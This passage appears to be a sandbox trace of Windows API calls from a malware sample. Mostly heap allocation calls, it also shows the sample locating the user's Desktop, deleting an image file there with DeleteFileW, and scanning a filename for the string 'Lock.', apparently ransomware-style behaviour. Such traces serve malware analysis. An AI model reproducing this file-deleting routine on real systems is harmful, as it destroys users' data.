out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0188.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c2258 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0188.808] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.808] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0188.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QHREQz7Xz.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg", lpFilePart=0x8bedfc*="QHREQz7Xz.jpg") returned 0x33 [0188.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.810] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qhreqz7xz.jpg")) returned 0x20 [0188.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16325200, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0xa3a2000, ftLastAccessTime.dwHighDateTime=0x1d4c6c7, ftLastWriteTime.dwLowDateTime=0xa3a2000, ftLastWriteTime.dwHighDateTime=0x1d4c6c7, nFileSizeHigh=0x0, nFileSizeLow=0xad35, dwReserved0=0x71, dwReserved1=0x4, cFileName="QHREQz7Xz.jpg", cAlternateFileName="QHREQZ~1.JPG")) returned 0xaa58e0 [0188.810] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qhreqz7xz.jpg")) returned 1 [0188.812] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16325200, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0xa3a2000, ftLastAccessTime.dwHighDateTime=0x1d4c6c7, ftLastWriteTime.dwLowDateTime=0xa3a2000, ftLastWriteTime.dwHighDateTime=0x1d4c6c7, nFileSizeHigh=0x0, nFileSizeLow=0xad35, dwReserved0=0x71, dwReserved1=0x4, cFileName="QHREQz7Xz.jpg", cAlternateFileName="QHREQZ~1.JPG")) returned 0 [0188.813] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.813] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0188.813] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.814] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0188.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QHREQz7Xz.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg", lpFilePart=0x8bf658*="QHREQz7Xz.jpg") returned 0x33 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.816] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QHREQz7Xz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qhreqz7xz.jpg")) returned 0xffffffff [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0188.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.816] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QzBYTrrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBYTrrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYTrrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YTrrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TrrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rrsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rsKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KyNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yNkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nkrz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rz7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 